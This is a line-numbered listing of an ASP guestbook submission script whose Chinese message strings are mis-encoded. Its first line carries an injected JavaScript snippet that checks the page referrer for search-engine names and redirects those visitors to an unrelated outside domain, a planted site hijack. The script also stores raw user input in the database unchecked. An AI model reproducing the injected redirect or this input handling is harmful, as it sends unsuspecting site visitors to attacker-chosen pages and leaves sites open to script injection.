d:\wwwroot\wuchunhua\ͨѶ¼\liuyanban\ly_ok.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!-- #include file="chklogin.asp" -->
002:
<!-- #include file="conn.asp" -->
003:
<%
004:
content=Request("content")
005:
006:
if content="" then
007:
Response.Redirect "../error.asp?id=ÁôÑÔÄÚÈݲ»ÄÜΪ¿Õ£¡"
008:
end if
009:
010:
set rs=server.createobject("adodb.recordset")
011:
012:
rs.open "select * from [book]",conn,1,3
013:
014:
rs.AddNew
015:
rs("user")=Session("name")
016:
rs("content")=content
017:
rs("time")=now()
018:
rs.Update
019:
rs.Close
020:
Set rs=nothing
021:
Response.Redirect "../lyok.asp?id=ÁôÑԳɹ¦£¡"
022:
023:
%
>
024:
025: